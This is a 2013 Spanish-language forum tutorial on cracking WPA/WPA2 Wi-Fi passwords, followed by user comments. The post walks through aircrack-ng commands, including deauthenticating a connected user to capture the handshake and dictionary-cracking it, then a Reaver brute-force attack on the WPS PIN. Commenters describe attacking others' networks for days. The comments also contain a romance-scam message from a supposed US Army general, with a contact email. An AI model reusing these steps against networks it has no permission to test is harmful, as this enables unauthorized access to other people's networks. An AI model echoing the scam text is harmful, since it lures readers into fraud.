Descifrar Claves Wpa/Wpa2 -Psk-Tkip-Aes 2013

Tutorial Paso a paso en video: donde se verán los tipos de seguridad wi-fi. El método de descifrar claves Wpa2 con diccionarios y otro metodo que es con Reaver.




Los diccionarios de passwords, esos archivos que tanto usamos en nuestros ataques de fuerza bruta, con la esperanza de encontrar en su interior una combinación de letras, que formen la contraseña de algún usuario en un servicio que estemos auditando, son de gran ayuda e indispensables en la caja de herramientas de  cualquier auditor; Podemos encontrar listas de passwords con nombres comunes, nombres de famosos, de películas, de ciudades, con los passwords mas utilizados, e incluso crear o extrapolar nuevos? pero hoy traigo otro tipo de passwords, passwords de sitios cuyas bases de datos han sido expuestas en la red.


Pasos para Descifrar Claves WPA/WPA2 con Diccionarios :


1.-ver nuestras interfaces



airmon-ng




2.- seleccionar una interfaz y ponerla en modo monitor:


airmon-ng start wlan1




3.- Escanear las redes que estén cerca:


airodump-ng mon0




4.- seleccionar la red a atacar y capturar paquetes únicamente de la red seleccionada:


airodump-ng -c -w wpa2 ?bssid ?Poner MAC? mon0




5.- ahora vamos a capturar el HandShake, para eso vamos a desconectar a la persona que este conectada en el modem y obligarla a que se vuelva a conectar y en ese momento tendremos el HandShake:


aireplay-ng -0 20 -a ?Poner la MAC? -c  ?Poner la Station? mon0




6.- Cuando tengamos el HandShake se mostrara en la parte de arriba de la terminal:




7.- Vamos a cargar un diccionario primero ponemos ls


ls




8.-Ahora cargamos el diccionario, en mi caso guarde todo en la carpeta root, si lo guardaste en otra parte pon la ubicación del archivo, también debes poner el el archivo que guardamos y en el que capturamos el handshake en mi caso se llamo ?wpa2?. ejemplo de todo y el comando:


aircrack-ng -w diccionario.lst /root/wpa2-01.cap




8.- Ahora ya comenzamos a probar las contraseñas que vienen en el diccionario. Este es solo de prueba, el diccionario ya esta desactualizado pero así se vera cuando este buscando el password:




9.- Con un diccionario completo tienes mayor posibilidades de encontrar el password o la clave y cuando termine y la encuentre se vera así:




Atacar una red con diccionario es efectivo en un 80% si es que el usuario no a modificado o personalizado su contraseña, se puede dar cuenta, cuando el usuario a cambiado su contraseña por que normal mente también cambia el nombre de su red.


Si el usuario ha cambiado su clave y la personalizo, tendremos una posibilidad de tener éxito de un 30% a un 60% de descifrar su contraseña con diccionarios.


????????????????????????????-


AHORA VAMOS CON REAVER


También tenemos la segunda opción para descifrar claves wpa/wpa2 con REAVER el cual es mas facil, si es que el modem al que vamos a atacar cuenta con el sistema WPS.


Básicamente el fallo en WPS descubierto por Viehböck es que uno de los 4 métodos de autenticación ofrecidos por el estándar, en el que se utilizan un PIN de 8 dígitos, no limita el numero de intentos erróneos, permitiendo ataques de fuerza bruta, pero además, con solo enviar los primeros 4 dígitos del PIN, si estos son erróneos, el sistema responde con un EAP-NACK evitando así que se tengan que procesar los siguientes 4 dígitos y facilitando la tarea del atacante quien no tendrá que procesar 100 millones de contraseñas sino solo 20.000.


1.- Lo primero que debemos hacer es ver nuestras interfaces:


airmon-ng




2.- Después seleccionar una interfaz y ponerla en modo monitor:


airmon-ng start wlan1




3.- Después escanear las redes que estén a nuestro alcance:


airodump-ng mon0




4.-Ahora antes de realizar el ataque con REAVER verificar primero que el modem que vayamos a atacar cuente con el sistema WPS para ello utilizamos el siguiente comando en el cual pondremos la MAC del modem que seleccionemos y nos dirá en la parte  ?Wps Locked? si el wps esta activado o no, saldrá YES / NO  si dice YES entonces podremos utilizar RAVER de lo contrario entonces nos conviene mejor realizar un ataque con DICCIONARIOS.


wash -i mon0 -b ?Poner la MAC ? 






5.- Ya que confirmamos que el wps esta activado entonces realizamos el ataque con REAVER


reaver -i mon0 -b ?Poner la MAC del moden que vas a atacar? -vv




REAVER comenzara realizar el ataque, les mostrara las peticiones que vaya realizando y al final les mostrara la contraseña o clave y el PIN del sistema WPS. Esto puede tardar dependiendo de la intensidad de la señal Wifi y puede tomar 2 ? 3 ? 8 ? 12 ? 15 Horas.








WPA2 AES es la mas fuerte sin embargo con REAVER no resulta ningún problema, solo es cuestion de tiempo. por el momento es el método mas efectivo para descifrar claves wpa y wpa2 ya que muy pronto los modems tendrán seguridad wpa3 y estos metofos dejaran de ser efectivos, como en este mundo de la tecnología NADA es 100% seguro y ya habrá mas herramientas  para realizar auditorias WI-FI.
Descifrar Claves Wpa/Wpa2 -Psk-Tkip-Aes 2013
40 Puntos Score: 8/10
Visitas: 16305 Favoritos: 31
Ver los usuarios que votaron...
25 Comentarios Descifrar Claves Wpa/Wpa2 -Psk-Tkip-Aes 2013
lastima que simpre llege a tardar mas de 7 dias en hackear las wpa2 :c intente hackear una wpa2 pero ya llevava 5 dias y apenas iva en el 50% y ahi lo deje para despues lo bueno esque se puede poner pausa en el reaver xD
no funca sin el wps encendido lo mismo buen aporte .. saludos
Cita dn87: Mostrar
@darksnees  si con diccionario es algo dif?
@dn87 Cierto el wps de un modem con cifrado wpa2 debe estar activado de otro modo no se puede utilizar Reaver, solo quedar?
@jonstroke si eso lo se el que intente hackear tenia wps activo pero aun asi tarda :c y con diccionario no pus me llevaria  1mes avansar al 50% y para acabar no te da la contrase?
@jonstroke Tengo una duda, ya ves que con el m?
En mi vida, unicamente e logrado Romper las WPA2 con el m?
hello dear!
Greetings to you, My name is Robert Cone overall, I'm a GENERAL U.S. ARMY, I hope this post is well and healthy and I hope we can establish a relationship since we met for the first time, I have gone through a profile that speaks well of you on this site and I saw your profile and decided to reach you. It is my desire to meet you, I like honesty, trust, love, caring, truth and respect, I have all these qualities in me, kindly respond to me through my private email box (generalrobert50 @ hotmail . com) so we can know each other better. Hope to read from you if you are also interested. Thanks, waiting to hear from you soonest. EMAIL: ([email protected])
10+ x compartir la info amigo =)
@darksnees Enserio te tarda tanto ? lo m?
@Ermac. Por cierto te recomiendo antes que todo probar con un diccionario Num?
@jonstroke Muchas gracias por la info
@jonstroke exacto amigo tarda mucho mira la se?
Estoy seguro que romper estos tipos de seguridad son casi imposibles, para romper por diccionario tienes que tener demasiada suerte de encontrar un router con la configuracion default por que imaginate que la clave se: maripos4.cabreada, pues nunca tendras esa palabra en tu diccionario, y para romper por reaver es necesario que el pin sea 12345670, que es el que tienen algunos router por defecto, pero hasta donde se casi todos los routers y modems actuales tienen el wps autogenerado, pues el reaver solo tantea con numeros al azar, las posibilidades se reducen increiblemente, asi que solo queda contratar un buen internet, o si de milagro encuentras un WEP pues ya te sacaste el premio grande por que esas si se pueden romper facil
la verdad como dicen los colegas si el ws no esta abierto van pasar a?
backtrack murio ....ahora es kali linux
@Phyr0 Eso es verdad si la contrase?
@siervo9 es la nueva actualizaci?
@jonstroke Bro yo conosco reaver desde que salio, se como funciona y hasta se su origen pero en donde vivo no encuentro router que tengan el pin por defecto siempre tienen uno aleatorio y el reaver despues de intentar 12345670 pues se imagina numeros y con ese numero tantea, es practicamente al azar lo que hace, claro no hay duda que es un gran avance que hacen los hackers al encontrar un agujero de seguridad en algo que se consideraba imposible de eso no hay duda, pero todo depende del router al que ataques.
yo utilizo wps, solo tienes que Asegurar de su estado, y ver si no esta bloqueado por mac,(solo es una especulaci?
Yo eh utilizado Reaver desde hace tiempo y con el 90% de los routers que tienen activado WPS me ha funcionado, lo recomiendo ampliamente. Pero algunos routers desafortunadamente no tienen activado WPS y no eh encontrado un metodo que sea efectivo frente a una red de este tipo, alguna sugerencia de un metodo que le haya funcionado?
bueno aca en pr hay unos moden de claro que son technicolor y vienen con wps activado y con wpa2 psk con encriptacion AES,CCMP Y NO HAY QUIEN LO PENETRE osea lehe entrado pero el reaver se queda en 123456790 mas nada y en metodo automatico de wifislax tampoco no hay quien desifre esos modem technicolor
Cita Akashia: Mostrar
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!